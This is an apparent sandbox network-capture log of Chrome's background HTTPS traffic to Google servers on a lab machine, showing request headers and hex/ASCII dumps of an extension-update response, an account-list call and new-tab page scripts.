                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC9INData Raw: 35 31 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 34 35 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 36 35 33 32 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                                                                                        Data Ascii: 51e<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5453" elapsed_seconds="36532"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC9INData Raw: 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70
                                                                                                                                                                                                                        Data Ascii: mhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><ap
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC10INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        3192.168.2.349713142.250.185.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC7OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                                                                                        Host: accounts.google.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                        Origin: https://www.google.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC7OUTData Raw: 20
                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC10INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Mon, 06 Dec 2021 18:08:52 GMT
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                                                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-WbK9RjjR/8vIDYdaCgmBkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                        Content-Security-Policy: script-src 'nonce-WbK9RjjR/8vIDYdaCgmBkA' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                        Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC12INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                                                                                        Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC12INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        4192.168.2.349715142.250.181.228443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC7OUTGET /async/ddljson?async=ntp:1 HTTP/1.1
                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        5192.168.2.349718142.250.181.228443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC7OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC13INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Version: 413663202
                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        BFCache-Opt-In: unload
                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                        Date: Mon, 06 Dec 2021 18:08:52 GMT
                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Set-Cookie: CONSENT=PENDING+151; expires=Wed, 06-Dec-2023 18:08:52 GMT; path=/; domain=.google.com; Secure
                                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Expires: Mon, 06 Dec 2021 18:08:52 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC13INData Raw: 34 35 62 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 43 48 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 70 61 20 67 62 5f 56 61 20 67 62 5f 4c 65 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63
                                                                                                                                                                                                                        Data Ascii: 45bd)]}'{"update":{"language_code":"en-CH","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_pa gb_Va gb_Le\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003c
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC14INData Raw: 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 33 20 31 38 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 35 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 37 76 32 68 31 38 56 36 48 33 7a 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 70 61 74 68 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65
                                                                                                                                                                                                                        Data Ascii: e\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC15INData Raw: 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 5a 63 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 64 20 67 62 5f 50 64 20 67 62 5f 4c 64 20 67 62 5f 49 65 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 51 64 20 67 62 5f 53 61 20 67 62 5f 45 64 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 75 70 5c 75 30 30 33 64 5c 22
                                                                                                                                                                                                                        Data Ascii: ass\u003d\"gb_Zc\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Ed gb_Pd gb_Ld gb_Ie\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Qd gb_Sa gb_Ed\" data-ogsr-up\u003d\"
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC16INData Raw: 67 62 5f 50 65 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 36 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20
                                                                                                                                                                                                                        Data Ascii: gb_Pe\" focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M6,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC18INData Raw: 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 22 7d 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 5b 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 31 33 30
                                                                                                                                                                                                                        Data Ascii: 03c\/div\u003e\u003c\/div\u003e"},"left_product_control_placeholder_label":["left_product_control-label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[130
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC19INData Raw: 65 6e 64 5c 22 3b 5c 6e 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 63 65 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 42 20 2e 67 62 5f 43 5c 22 29 2c 64 65 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 44 63 5c 22 29 3b 63 65 5c 75 30 30 32 36 5c 75 30 30 32 36 21 64 65 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 24 64 28 5f 2e 52 64 2c 63 65 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 2f 2a 5c 6e 5c 6e 20 43 6f 70 79 72 69 67
                                                                                                                                                                                                                        Data Ascii: end\";\n\n}catch(e){_._DumpException(e)}\ntry{\nvar ce\u003ddocument.querySelector(\".gb_B .gb_C\"),de\u003ddocument.querySelector(\"#gb.gb_Dc\");ce\u0026\u0026!de\u0026\u0026_.$d(_.Rd,ce,\"click\");\n\n}catch(e){_._DumpException(e)}\ntry{\n/*\n\n Copyrig
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC20INData Raw: 68 69 73 2e 77 69 64 74 68 5c 75 30 30 33 64 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 5c 75 30 30 33 64 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 68 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5c 6e 76 61 72 20 6c 65 3b 5f 2e 6a 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 28 62 7c 7c 64 6f 63 75 6d 65 6e 74 29 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 53 74 72 69 6e 67 28 61 29 29 7d 3b 5f 2e 4d 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 69 66 28 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 61 5c 75
                                                                                                                                                                                                                        Data Ascii: his.width\u003dMath.round(this.width);this.height\u003dMath.round(this.height);return this};\nvar le;_.je\u003dfunction(a,b){return(b||document).getElementsByTagName(String(a))};_.M\u003dfunction(a,b){var c\u003db||document;if(c.getElementsByClassName)a\u
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC21INData Raw: 5c 75 30 30 33 64 64 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 5c 22 63 6c 61 73 73 5c 22 5c 75 30 30 33 64 5c 75 30 30 33 64 64 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 5c 22 66 6f 72 5c 22 5c 75 30 30 33 64 5c 75 30 30 33 64 64 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6c 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6c 65 5b 64 5d 2c 63 29 3a 5f 2e 69 62 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 69 62 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6c 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c
                                                                                                                                                                                                                        Data Ascii: \u003dd?a.style.cssText\u003dc:\"class\"\u003d\u003dd?a.className\u003dc:\"for\"\u003d\u003dd?a.htmlFor\u003dc:le.hasOwnProperty(d)?a.setAttribute(le[d],c):_.ib(d,\"aria-\")||_.ib(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};le\u003d{cellpadding:\"cell
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC23INData Raw: 6e 20 5f 2e 6e 65 28 64 6f 63 75 6d 65 6e 74 2c 61 29 7d 3b 5c 6e 5f 2e 6e 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 53 74 72 69 6e 67 28 62 29 3b 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 5c 22 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2e 63 6f 6e 74 65 6e 74 54 79 70 65 5c 75 30 30 32 36 5c 75 30 30 32 36 28 62 5c 75 30 30 33 64 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 29 7d 3b 5f 2e 72 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3b 62 5c 75 30 30 33 64 61 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 61 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 62 29 7d 3b 5f
                                                                                                                                                                                                                        Data Ascii: n _.ne(document,a)};\n_.ne\u003dfunction(a,b){b\u003dString(b);\"application/xhtml+xml\"\u003d\u003d\u003da.contentType\u0026\u0026(b\u003db.toLowerCase());return a.createElement(b)};_.re\u003dfunction(a){for(var b;b\u003da.firstChild;)a.removeChild(b)};_
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC24INData Raw: 72 69 62 75 74 65 28 64 2c 63 5b 62 5d 29 3a 61 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 64 29 29 3a 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 7d 3b 5c 6e 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 2f 2a 5c 6e 5c 6e 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 5c 6e 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 7a 65 2c 41 65 2c 42 65 3b 5f 2e 79 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 2d 62 2e 6c 65 6e 67 74 68 3b
                                                                                                                                                                                                                        Data Ascii: ribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};\n\n}catch(e){_._DumpException(e)}\ntry{\n/*\n\n Copyright The Closure Library Authors.\n SPDX-License-Identifier: Apache-2.0\n*/\nvar ze,Ae,Be;_.ye\u003dfunction(a,b){var c\u003da.length-b.length;
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC25INData Raw: 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 63 21 5c 75 30 30 33 64 62 7d 29 2e 6a 6f 69 6e 28 5c 22 20 5c 22 29 29 7d 3b 5f 2e 45 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 63 6c 61 73 73 4c 69 73 74 3f 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 5f 2e 44 65 28 61 2c 63 29 7d 29 3a 42 65 28 61 2c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 74 65 72 2e 63 61 6c 6c 28 41 65 28 61 29 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 21 5f 2e 6c 61 28 62 2c 63 29 7d 29 2e 6a 6f 69 6e 28 5c 22 20 5c 22 29 29 7d 3b 5c 6e 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d
                                                                                                                                                                                                                        Data Ascii: ,function(c){return c!\u003db}).join(\" \"))};_.Ee\u003dfunction(a,b){a.classList?Array.prototype.forEach.call(b,function(c){_.De(a,c)}):Be(a,Array.prototype.filter.call(Ae(a),function(c){return!_.la(b,c)}).join(\" \"))};\n\n}catch(e){_._DumpException(e)}
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC27INData Raw: 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 5c 75 30 30 33 64 74 68 69 73 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 5c 75 30 30 33 64 74 68 69 73 2e 74 61 72 67 65 74 5c 75 30 30 33 64 6e 75 6c 6c 3b 74 68 69 73 2e 62 75 74 74 6f 6e 5c 75 30 30 33 64 74 68 69 73 2e 73 63 72 65 65 6e 59 5c 75 30 30 33 64 74 68 69 73 2e 73 63 72 65 65 6e 58 5c 75 30 30 33 64 74 68 69 73 2e 63 6c 69 65 6e 74 59 5c 75 30 30 33 64 74 68 69 73 2e 63 6c 69 65 6e 74 58 5c 75 30 30 33 64 74 68 69 73 2e 6f 66 66 73 65 74 59 5c 75 30 30 33 64 74 68 69 73 2e 6f 66 66 73 65 74 58 5c 75 30 30 33 64 30 3b 74 68 69 73 2e 6b 65 79 5c 75 30 30 33 64 5c 22 5c 22 3b 74 68 69 73 2e 63 68 61 72 43 6f 64 65 5c 75 30 30 33 64 74 68 69 73 2e 6b 65 79 43 6f 64 65 5c 75 30 30 33 64 30 3b 74 68 69 73
                                                                                                                                                                                                                        Data Ascii: .relatedTarget\u003dthis.currentTarget\u003dthis.target\u003dnull;this.button\u003dthis.screenY\u003dthis.screenX\u003dthis.clientY\u003dthis.clientX\u003dthis.offsetY\u003dthis.offsetX\u003d0;this.key\u003d\"\";this.charCode\u003dthis.keyCode\u003d0;this
